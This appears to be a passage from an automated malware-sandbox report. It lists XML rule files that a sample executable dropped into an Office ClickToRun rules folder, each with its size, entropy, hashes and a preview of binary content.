                                                                                                                                                  Preview:<?xml.=.D.y.......}....r`.A.....F..dz...>..]..q...t. '...!.S.0.....n=.d.Rqf.......a..{.U*...)...B.$._:....j..+w....E$..+...#..R.............Q..T....%.#WG3.......n*.~....I...S.=.|.._..>.?...F.1O.^~#l.'..0......u'...2].WJ{E....lo..t..D&....\..U....s.....^m.6.g...N2..W.A..l.J..8h..2..~Q).-:.M....b.[...-y1.L.U._.q.%.b1c.g.d.`X.H\l..Lf...]`@Z.mP....&.Z.pnl0..cp..:zw..My........,6..=]'^[.!*),0.......AI....y...^M.i......9"..o...}..>'.;.........o.w|.W....V...@7..y..4..0.(f..X.FW.N..8.....{b.L.6..6......b.`......./. jS...IY..y..!N>...........,~W>...P.C..!4.>A.L..-....H.CX.....dj..m..}48... ..n.......=.<.<._..F9..|.".yR...v.-.......(.$.V.zT.c.._...t5..+.i.B.l._.5.>t..R.d.0...{...3....7.S.+...c..\.....o.nC~q...-.....F....=....gU..F.Y...6....e;.Xop.d..n&.J...Mj.....o.....*L1.x..|...P,..pf8\...d.....%.F..rm.v.Tw..y.8.(..k.it...0......0.. p......F^.....1.....b..t..+]...'.- _......3...1.T1.....D..Y.....{J.p..#.ns....G....Dq..`.N)y..A[l3`.._..B.k

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1736
                                                                                                                                                  Entropy (8bit):7.888311267308593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:a4gITsZV4DDYlwBLRZZn4jTQiiWI4Mp+tD:7/KVik0LRX4jTQiiWI7EV
                                                                                                                                                  MD5:8DAAEA45FB9087410BE5690AB265B7EF
                                                                                                                                                  SHA1:794D0127243B610FFB16F9992BF97726B7656742
                                                                                                                                                  SHA-256:B41381FA133F852F25B32A0D1FA89666A336E851EBE6899A0BD5C4653F26A7C9
                                                                                                                                                  SHA-512:6B6CB14ADDB640A0A356A03FD69E4D0A0F479E7B48935E48BFDC61A96A58999404A072389EAC71479CF8C07F8D449DA0D2DC47A352516AC7CCFC700CDB911DB8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....}.l...V..BT...gK)d.s.#..H.d..@\....c.........lP8..R.f....K.hy. .Ze....&<..=....Q...W.o.n#EUR...?\Y.....WX.m...g=i..=...T...H.x....)..b....;Pgu.NB...pSssD%..*....Mt....&4...9&.t....X....6..k..h....HT...%.8.^.....\.n..*w:..t.,6.n..D..8.M....+...)-..c..e.....Q..x...a.Z.yH0;S.......t.0.r.%....w.<.7@..g...tF.Gv..T..F.m.........;..{.._......Z.....N...22..6.k....f.A....2F..1.....b.....,/.X`,Iy.-.........12%.m..&Sv.H...G$/.O...*A.|ZuQ../.<..4.....6.[..}q..?k#...U:....!..\.F`..c........=..AN...].....9..RPK....)!.{....,.Oy."Q...&....ox.......O<O@Ra=Q....|.........,..v<.c..fk..N.l>@.n.Q=.I...[..(..zD.....%O}.......{@.<.H..MZ#.pU.+,.k.~PU.kO...b~h.}..U.[j[+[..V....)... +...%.B......5K...7.......p...D0.`u%.s.md.xi.y.v.....6....}..z.i..U@..5.r...*..W.P!..7..J.{..._....,.K..BC..R.o.p..&..3....^..Fr.X.;..:..N...@.n..20...y..x....Pn:.... ........H...~ .7..`.X...-.d{.b..j?<1....D[R.=i.23..I.....7...H. "7.5q..w..$....@Aa..,.b.._._.?..9.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1687
                                                                                                                                                  Entropy (8bit):7.873006556519791
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7MVswhlLGU0U3CigLqnhMktEiDB/a88r+LCh4vK2X4rL6FFmXzdkH8XcULo0P2bD:4FhlQkWmhptNR5Ch4vK9H8FqIZUs0sD
                                                                                                                                                  MD5:408B5AD6F911B293498F20C6300B853F
                                                                                                                                                  SHA1:E01BAE62E5ABF87A81009DBF81601A7837B5D710
                                                                                                                                                  SHA-256:597DDEF75F15E170E15A4945ADE22B9446619832A96B7F3E3110C8BAFEF88A0B
                                                                                                                                                  SHA-512:F1B7BF6F30EA92D8B32201D6DF0D3E06B39745250950CE1E40080596E18E020F6F986B2F3D0B91E502258743F97D4CBD13E22A0E2E299E9C016FB38AA695E998
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlZ..=..]P?....9...Q..B]R...c...+...17.o.K.U5....#....~..#t..m..y..4..}.d...:..LJFV.Fm...F...C"....F.)...;.T.t+k..C....05d....u_..%A..e....}N..6?{s!...%.. .I.}.kJ...qA....t.......Q/3....:.6f..G.,... i.....8...!.....5..Q...k/.a....2.vo~.'FW...bt..\....U.-p...a..{..h...e.\.....-...% .Qr...~...U....2.bH.M1.5..)..).yvD....R.1....~.:.................1..#.R.......<tcK..+V. ..>. ...BW..x.Z...pn..@m.........PJc4.#.[|(4.%...oV...^..Y.....Md....;..X.h...1.S.........O..?kh..~(..i......>.>.b2...........K.Z.Y...iT_?.... .c...7.'}.....C...qp....%.f.6#.mS.&....6q+...AcD...|.....u.'...nZ....`.2s._QV...I...7.......Z.F.;....(kT...'mp..?2I....h.c...i...W..4+xi...in0..w.^.c.n.*..c.r9"E..x.0).j..i......<.!&S..."...y.T.. .&.$7A./{XSP..nM`+Lq.....&..N.th3.cYF....J...r.j..X...7.......@8...t.....a..x..."........$....n._..J.F..../...J.!5!..!..O6.=....O..^.....M\S...^'.`.;Q."...|.......;J...xg\.Ddp....B-n.DD.OfO.~.^..ns.`.e.-..M..71f.q.m)5>.m@.lt`.`....Y.....k..'@s.g..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1724
                                                                                                                                                  Entropy (8bit):7.8786456619610865
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:aj1518l8PFVJDhQbc2XoDdGPpKuzJTAMANXSAwjK+lTuiYIkQD:c+yte42X+dCJKCAQXVuCkM
                                                                                                                                                  MD5:9E2A0E01D333F8F1AF3E25A668A510E5
                                                                                                                                                  SHA1:09A0B2AFC8882633324D88FDCCF55C737E6C7D5E
                                                                                                                                                  SHA-256:C3B5216468A7A294570E4A86CB7E85FC37EBC463590577D3DCE3628AA6F589A0
                                                                                                                                                  SHA-512:26080CF5C724414A7B0DD9BDF167E57C67D9066703C2D5C2956308D803124A5612F23498FCF1E725313FA48910504AEBD5586D8F66F7DC98F4ABD7DB2E4BD631
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlv.U...?..(z8.Y"uvt.9<......4C.....=2.Q\;.?.+(f...7..$.IV..'][.)......K...O+;HI.y.....6..<<.w... ..L.........n....@........yn$4..Y....D..A.. .......m.N...^B..iXt.V^.m9..[..).kE.....T: .N.;i....\.VaK.s...(-...W.M.....Z..LG`t.....8..wpU.....$@....=.&..._o..P~...3.{.Q8...}h.|..@..pV.o...Y(....~....F`z...(.......y......b.z\ ...em..........'.U......)..1.......k.Y...ro....+G../h .@K.1}#...fs..&.q.L....V.Bc...*....3qq..z....n....u.a.....h. )7.p.z..;H..."(1..0S..T..H...7.... B.!...!....o......*.}.>......`..].xYX.$...@G.E.^{P;..Pp...G_qX..v.a..D.Y..5.uK.}..v.....~LK..x.&...@4s..T.Lf......M#.x3u......I.].8,..., .~....W.=..0.....:.m..@Z....9.v.....>.).h..4:..j.....{-..).........#.F.}.v.Q'Ea#.t.A.#.....\...@...4......Z....Pn..X<....t.v71&.[..o.0&.w....g'........{B+.4....]#%.VQ....(....n4%8....a.4..qV.....\..k.eT3.U....y.Tp.W{..M.../.,..aa............. .U.W\I...;..7..ft}..j.M..i..u9.|yd/...r.......1...YZ.(d.4H9.f.L4...J..dw"!l..`......l,

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1701
                                                                                                                                                  Entropy (8bit):7.886306481596357
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:n1GM1NBbLcnP5jmEwRwI45NXe5RpvVBKFinUpDR5bpD:nR1NBbLmmElnIRBVBK4UpR5l
                                                                                                                                                  MD5:F5C2A866CB9D9D09B77060717B3B15E1
                                                                                                                                                  SHA1:705AA2E8EC6FD9BD8E4475A33D74D4911F398D88
                                                                                                                                                  SHA-256:AEAFDF3E4FE653F9332B0892A9E9C4043C622D3ED10F92395ECEF62E0C309D32
                                                                                                                                                  SHA-512:171AC7D7695461D6D3033490789D31F02C2E1636B23274FE6937BAAF61AAA4373477511965E0E30A6B9FC99F7CDD35A5088BA8DB7A2B584BE390179678A0CAD6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.M.nK.$..........D...)]....0.r...&.|..rG..w...TTDJ.....%......C/....l..L..LA.KF..b?..d/t...........F.5:{.f`.~.'B....F0....-F....wb.&.)..D@.g.......:....yE.8z....P....b...v.F.e`.?...9Gd..AV..a.L?..*.w.J..|...)<.i..3.'<kq.MV[7W...:.s.)...v.`....j.K.t...C#..=j..}-k......~{.& .r.r....l'Q..&B.....x.>...[.<pv..RewjN=...d=.u...........t.....,..m#O7...E...]M_.D........M.=..Z.>.l4.;J.U..y#b<.A...t(P..(....m.._h..3u..|........6\.<.jj...@*qJ.@%<C7i.Tok.'..&5.A'.D .}...Cf.S.....x.$I......Y...K.n..b.......r..U6.Fh..#.......p...W.#MR..EP..!..8...U.3.J@'.....>.tU.-.A..3~..:.4$V..t.py........r..$...AhT. ..m...b.Vp3...z.^w..H.O...ZsB....../..j.3.N......+.I..jH.l2.F...^.....=:+.J.....e.g.<}."..Q....lOi@..MgHjz....@L..9...!5.Wh..N.7p.2...M.h.H..].CaT.8*{j..I@.RT.[..=.......]....wp...N|..h...Us....l.Oz.By..B.^......E..QW3.w$...m1=.......fb!...P....].OhTl....=y4.Y....#...V........S.*..5b..).5:...c...^F.C........^7...).L]n*U..w>lf2.n<.._.....~p.rs.o.1

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1738
                                                                                                                                                  Entropy (8bit):7.893334221704092
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:UIBcK4zEfjxAYFrgwT4e2WlgB7s0r54QD:MzEjFgw4AgBvuM
                                                                                                                                                  MD5:6BA117420FC36137DA45D30F573D60A6
                                                                                                                                                  SHA1:09FD544AD3C7E1119382675914C91C2F8C25A3F7
                                                                                                                                                  SHA-256:50D52DB3D0A3C473B09ABFB88F67660B68FF06AE6CB862786A48C6D27CC9AF19
                                                                                                                                                  SHA-512:B040BB47029738DA6C47B8A75DA0BA7CC7B502DB78C840DFB967BF598B7688AEBE4A3D6A41370795986A7234AF966BD54631CC5F8ACD99210DFED7547DB0D0BD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml."|.'.7._Q.;.......R.?:L.&Ui..$:_......R.w+.5;O..+.})9..6#j.}.......`..|........9F..R.....&..z.?.~ .p....~.|............OLnOy..E.T...B.....O...CU.;.p.....S..O.@Z..P.J....+..Y.......p.c.9.M=R..#....3|.....C....:.g...Q.B..g.i.x...<t.B....&!<..V..q..@I.l.y=.^..4.uW..\[L.SM.2..T.h:#....S.#>.\ ..."......6c.L.........Y..{'......... ....=....a^.:...6zOq..Wl.....dsI..h...=.....b..h......u..W.8=*f...d...l*@....af..Y{D%*x.i..F&g.r..X....&p.T.......+{....,.>..xxh......B.s. &..6...s...$..z....*..c..M3A........{.:c....!?.]...f..P..^p.Jy.,.7:.+....9.......?...t.s.._,Q.J.Q).?...q.i%.[......RV..\Q.f.....+..?.<%.T.8...+...4..PFP.3{..;?p.w.!OS....K-.......:...BNof....e.....v.X.......8..`..ir..o...D...|..Q...(...G...WG..Q1..~E..vN"#k.T.."..d..Q...{.Z.>..{....4..I.t.o...&;43c.P..i...0Q.....N..=.5...K.!.j|.$v.J}.b.Pl..3W6.._.B.-././M.....A?B_ioq.23...d.I..8. ....H. .5.*.. ...r.......lI..h.r_.6A..$.%A^%.cl?f/y..+.1l..Q.L...h..(....@<U...S...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1707
                                                                                                                                                  Entropy (8bit):7.889813773858442
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:JCjBCmg1QfFzQWwgqd8JTckSuNRw6R6dj2W6sb467ChPJfLCkbRfN7LfCmPp6b2X:J4zTdzXlJ9xDD6B1N7gRRN7DCmBvD
                                                                                                                                                  MD5:C726B55FA909B9CE3FAE34C6A0A15399
                                                                                                                                                  SHA1:916849E489F4A11C5FBF289183BBA6327BF47A4D
                                                                                                                                                  SHA-256:0B41DC30731B6657BB943ACEF56D3EBC365ACFD139A8D9727BFDAB1468C1B38F
                                                                                                                                                  SHA-512:80F3C8C03B680115C89C6DB9765CD80E1AA50D12C719907472981F7A8620B5D980F20B4ACBE07BAC22AB6A8A3A60BEDC46A6BF8BBA326DA5059983213989559F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.\..'..M......o..h8..#..h..T....2hD.2Z#.%.E.|.n...p(wz.j;.....e..@#......H...r...[....c..n..K..c......5.La...t.g.`..o.(..t2.Nx..#.\.*.~..8Q[............g}~N..8......$.@9.(..x....0.ad.w..............l.._..D..c...V..XC~IF...D...n.~......=....m..g.D%..h.W..^ys.|....V&.T..N.2.]..a,.U...R..Y.7.>..J@.w.^....5)..=.eHh.Z..4.\.......9...\t..,.L..Ib..g?X.>....m.....k.N.l..j .t..cA.I..:./T[.3..Aa.H.w~.-.@.v.l-.......DT.n._?.._]..2....5.4....n.ND)X........n.x.O.i...L...I.9.k9......0.cfq...4c...`w..%p}...........KnM.g;...\.....f.&+.;...........Z...?(.Rv(..x....:A.|.......FK.A..7.T.\.X..}l,....4B...5w.GD.+[..+zj.......U..I..z5/......Y.4......{.....]....,....j..(C.f?.d..Pa.~..vE7.s.p.o..c.B\......<I3....o.....,.-C..;.[E..@Z.j_.g.d..hqH'U(.3.....A....sp..H.`.};.$....u..X.&N.N.D.^.$.q-...C.. .\.l.8...~....3m....>.GW...p....C...*x..*........dr..=uF......-.....h...U.Wwm..".a...<.. ..._..1....0.....K..?..l..<O..D....\...(...E$..p=K..j...d=V.X.0

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1744
                                                                                                                                                  Entropy (8bit):7.893103501392767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OCIewWIp5YNRqmYM/W0Z9I4y83WTfB9TIDSKhYTFQgmn9EN6NSi2rml3iVF2bD:OTew/YNRqA/WIK4ymOB18Y1mn2NTQvD
                                                                                                                                                  MD5:D9CB320CCC886F5F2D5192AFBD575C61
                                                                                                                                                  SHA1:0AEC535F192D02E8A1961BD72401D2FC5B21D29F
                                                                                                                                                  SHA-256:08CCC24462579FAAEFE8D0A3FBD258FD2D9431D34A602A8FA57F4E1FF1E2CA41
                                                                                                                                                  SHA-512:56B4F144CD96875882931916FBF4EF1A157B2A37CB9D36AB122D83EF7FA9DF253A7A76C286467C748A377CCDEC0BAAC46AAC123F9B436D3076B9248C01C76B07
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....h.....`BV....mSW#....2..*.:..w.....pOa..(-|.<8X.n&=..^.A........g;.....i..#(..n1=.Kn...p.wg.1...... ...B....].W..e..G.n....^...d(...57...E..+b....|vZL!e.#....|.|.Zy.<..\[.mz.+..._.xs~.TM}YE....V..9qA4,8.x....h.I.j.(s0....@......?w.\..Y.bZ.[F8...|...wy;x9.f.W...j.j.b..tv.....1?.B......a....-P9......b)@.K.@C...Fdim.d~..E...~xc..c.=@R(.LQ9.X...f.2"m......."....u.AQ..9..W..>.P..@.....OA5<..........1#.~.Qdp..#l..z..]..(+A.q.....ER....r.3..*.....+G.c1..9Ly-[f..Pa.@._m.-/..1%..t.....q'CZ.e..Y{q..j.2?...b....|..I.f8,98+!.p.B..\.....B&...y.#.Y.~.`....u.!...8)..V$....g......k.o..8o`r........?AC.$.Re.q..v...(.u.NzO..w#@'g...O...'l\..W.....%5~....5aM.R.)9T/#...mZl.H+......i.....\O......:...O.*. U....+....}..(.....)..-.....3...~s..c.%K...s6.r.w...n='Oy...Xx(..\..~.m..../...)..V....$.0...rPU... ...\i6.".g... y...-...;....S.&..Y...aoq..{6....OY..h.+x.LD..c."$bAt.. v.\.B.Z.....D.NG.V^....t...0...Nt.B.j..E.iv.7q.5.b.P......S-J.+...v.t..{UH..x_X....E.x

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1701
                                                                                                                                                  Entropy (8bit):7.891476751780163
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1cao0dhlcPTQWJCH6WooE/FR4iWPLd3NCyAVmNzlGM2ilRSTwSbOKCBtZCmdh8si:+aJxcPUYhFBmVAV6zlGM1lRQ8tEJhD
                                                                                                                                                  MD5:16BBEBFF788A80A8984DAC0D612FC613
                                                                                                                                                  SHA1:D82BBC15D60B96C4BC40CC8AA0212DE59AC53824
                                                                                                                                                  SHA-256:587C38688AB7F99FB0CF039F36A3D4AC93586A6EAE93FF635823EF0152882645
                                                                                                                                                  SHA-512:85E1DBE71B5D83807EB99E78513412EDB2F2ADB252818CED394A6EBBC079B98A0F93487F2D94E57AC42FA3704F3D474837CDC2B8950124B36F50D2452E850237
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..x.Kj....re......i6v.6...._..0......>..`....g.....X..ue..$T..}...RR+.g.B...J.f.k.:.F...|...:%.?...v.s.0Nq_.;.<B....K.)....YV...Lx".Y.....pq<.4....Qm.J...#Y..PC30.s.v.y..Y)b.}...'...9.@.N8..{..V.1.{~O`.vP.|.. 7.d...............#R.+...E...,.@.\w.S`84y....C3......g....)_......U.+..F...+..K.2....}Y.m...sb.6x.Iw......,...^.vkO..C..).H...53..:;........'._..C..A.V9J....{..K.(.l..9..$.#....A(.[M?..)4...I^..w=...:R$.....i,.G.^..5...'....&.,d....8....#Wh..*..;.....+|..zTq&lQ.GiO.8+pNJ....\frqaXBD.ZP...F7%.M...<L.].Dc....3Zxv#......*.s&.....z.."..E...r^....Vq.m...v.|t....[._.....xO...LMV&..Q.l.(.d#u...j..P... ._...}..rP.....om]....]...L"..........8,,........p..N.v.*adYQ^...c.....o'........rT....G.GaHV......~..3..A.q.......]`...-.$.m..3..&a.o.t.... .W...B.......U...Fk.c_.@r..?1&...h]".v~I....v.Kq.W..Cq.$8>..O,Y.'.\..tC.e%....`#...3.l.~...x..].......%...|...N..:$3&%s.T..h.zCk...%8p).P.....3.M0{.E(e...bPl.@.....r.L.hU.az.....mPr.}...x....(......1.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1738
                                                                                                                                                  Entropy (8bit):7.8985519795614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ZxXH19+rsdLCP0J+q0GabEZAv9Ed7e6xlsQPZaKWD:Z5/+rs9CP3dGabvy5eKlsQwKO
                                                                                                                                                  MD5:25BD53BED51680C6B0650AA5589B9D94
                                                                                                                                                  SHA1:D3AD7C04E788F28A50D9996A3962DA84EBFCC004
                                                                                                                                                  SHA-256:B425AB478AB192BB0DE40E40529B26BC2675D22615E151544A21CC7A7FBF1CA5
                                                                                                                                                  SHA-512:F2210C99FC8FDCA9AF3E80203743D94A72AF3772788C322FBE31E521050F0FA88384E2A5159D5B3C7A2524F17DC25A1BA364E80E2051643E3A2F3486A0167ABB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmla..HV....e7...J...l<Y....;...F.._..'..&.x.....Z.TV..MIsPI.1.SP...a.W....G!.A.!..q.u.-+=..H......W..IF.....n...Z.$.....>2....A..%....-?...........&(..pc?.$... ...G#..$#..)..`..d..-aw..U..{.!. .Qe..Q.XF..3...*.-V..Ij.../4..-./..T..(..ih........Z.x..$pV.......n{{..+..:.R&..2...T.y.~......w6.H..9.n.%.[..l.n.uq.YXfU^......K..{..S2.......x..<.)........?&G...L.h./...rF....|.....wp}.L..8D.......B8.....B..i8....S.5...8Z.yG...Z9.....e..5,..uUa..p!.].-.u.....P.j.pW.8.<W.5. .=..N..c....0.!.I]...S..0.;..A.....A.w._[.......... ."....Q%.>n....\....=...Q`..3....Z.t..wW..(....e...{...t.w7u%wxMM..j.}...S.H...ao..q".lc....+. .'.U......B:c...Y..h"...9x...7N.rKfPAk..0...)....1...\n.g..v......+...i@@..*........+Eo].....u.#.....D ....@A|....:V.....a)....f.#@.m.^.1...T9)...........g.._..........6.S..^b...........X.C......c..p1....;...Y.&.."....zo...>90.....w/C.*.E.!.......1j!..x...6,.VT`L........'Ae...vMY..#Y.B.-..t.[.c....*..\......6.s.....\...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1702
                                                                                                                                                  Entropy (8bit):7.894369158838242
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:i3uph5bFCBvaAqcwKUSiRIAQhYPYZTl6kCWt5CjomoPsGvJCeXr+chwym2u2bD:i3WhDA5kFRIbIjkPsGvJCgXySD
                                                                                                                                                  MD5:5E206A9EC269EF0FEB8793DA7529A52D
                                                                                                                                                  SHA1:C444426653DC1114EB3A8D75E16EE1998210B7CE
                                                                                                                                                  SHA-256:AE2729BF8D2FFB525CD2E2607A3B9039BD051BA73789B00A1766A30DDC907EFE
                                                                                                                                                  SHA-512:916B7F6833B1FE96283061A1718DF94A1CFDDE8389D965145907B097278EE400E4D5C9FEE01AFC7C2D074CB1DA7F44EB542F6B92FF13322BC57DDF979A72794A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml8..aH.s....\W.v..t*.H...K...>..;...`.GW7..:W?[.DZb"._...Qr2.6...|U.....u.:.....]..38...?i.2.u".%.!...m....6._....!f<..S....".~NQ...zL.w.....J=n...>y.8..F....x.f.k/.e.C.3s|i.d...r..4W.8Ahr.......... .t...}.]..A...kFH....Y..F9..d....o...:.Z....j..*.l.wz......r!@"...(...).a.ZqC..I......u.f....Y...O..i0.q=....>.....NLO.....(.$.(.@.Ko\!'..D.>w...jv2.j%7.,...WR.......P..@z.. ..o.1k..T.....)):.7&....?....ip...q/%.....s....D........%..).0..=.D...8c._<.....AvL...;.A..|..........x..Y.'b.V...,..H...L.7.`..i_h|...Yk..y.}BM".P.j...@.?pR.Nwv.....\.....U..5.Y.3..`_.Xc:.....E.....X..Ba{s.rGb7.r....\.$...5..l...UiV>\mL3X'.YE.j..6...C..?z;d.^..wK[i..u.....N1G...........}........f....ZNE|....'....}.`..m.........<$...`.......!.Rl'./L.?......yy...l..F?r.).N.....(.j.0tA.'w...IW.......7..f..V.v.p..+CT.5y..Y.....%*Wc..R...b...*.G..K.......Zi..k.....k^...,.l.../..H.........T.C.6....g%.~So....Z..:.m.....o.y....xp.~3...A\bLl...-.m......."9.Tcr4.v.|.q"...F.X..$.i.G.c

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1739
                                                                                                                                                  Entropy (8bit):7.889716703702687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:I7O4fqFWVXdiP1hIG8yJIqCZAAGKz5oJNQguC5QYruN+aOW6qNVnpTvM7HM2bD:GOOqciP1653/Zz5gNQpyazTN7TafD
                                                                                                                                                  MD5:E9E5C348FE332D2EBE142CAA99B97785
                                                                                                                                                  SHA1:8E86E7B7B1552E0C44199CEB152BD83F77A57F0F
                                                                                                                                                  SHA-256:0CE064EFC5BB197E448C9E12349CDB64B8CC82557572ABB106834F4E9E20F858
                                                                                                                                                  SHA-512:7C2E11BD0DCB06139EA0CC93D94B97F06B59BE6993FDECAA5400075AB2B3891D54E7835C9DC9F4C6DF7131D238FD1217F5606CB5F1082A161479C95EF7496BC1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml5....a2..Y.ny...y6......H..E.l.^..]k...*.."..g...,...iq....$.4..d..wq.&v..nz>..E3H..XN......t.2.......g\...... .@....j.;.E.Ye...o`.1}.....#..[...r.....L...u1.=.SsJ;v%.r....l..Gx...j=....<....Lw.).0. {k.2.. ....0.u"/.;DEv.-..b....-...]...o.y...k&...P..#.Z....$.....Q.e..5z.M..y..l.Y...1..Uu........I.ywv&(Ly.....->...).z.8f7..;.?.!...J`...u.....C....Z...M.{..~.W........(Q..).v"x......V.~...Q..}d.~U..r.zV1.D..H...kv........|.......as..G..:fm`.+S...P,......N..^..u.h'.M....Wfb..1{...#.6...C}!ZNg.~.@..0.J.p..`f..~`...,A...:T=2Uu....,...v........M(..u.%.......C..m/q.8.6....E..v..-*..c)....._Eh(.g......*..`}.V.^. ~0...*.*.g....@.V...qd.5.c....+...........I.f..@.....Z..5Oo..-%.)rS...2"....F.s...U..Y...B..?.....>.7.2.>.vI...~..g{..HCt.0...1..u.>.t.......SY.....VW6....PO..)N.V.....n~dL..f.$....,.\.Te..6,s.9.w...!....i.T/..Cpv...d..r.h..f`.o;...k.$.w......+,JH..\c~..L..fyiO.~;.@r.V.Jk.p..)<...j.-....i...}.t.n.yu!....'..s.K....L..|V..u.G...."a..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1724
                                                                                                                                                  Entropy (8bit):7.89446743242666
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:k3O+JNXfDj657qu/TzYfxCzimXxbxeqHD:k3HNXa5qfKi2xd
                                                                                                                                                  MD5:F96EC1DA3DDDC63DA07D7AFE6410BBAC
                                                                                                                                                  SHA1:C880A8E32226C21B72E79EB6435162F1836841E8
                                                                                                                                                  SHA-256:7329A79F15CADA6ECEACFEF653ED6E753F51A943511CAA81DDFD0847C25E745D
                                                                                                                                                  SHA-512:18B7C7393F817E4D33860C8AE4182F49FE6E4DE89B85ABDCF7A2B9006C438855467596B73287E984CACDFEDE9E4E5550111FA618028E97F22CF5982FC5FB9883
                                                                                                                                                  Malicious:false
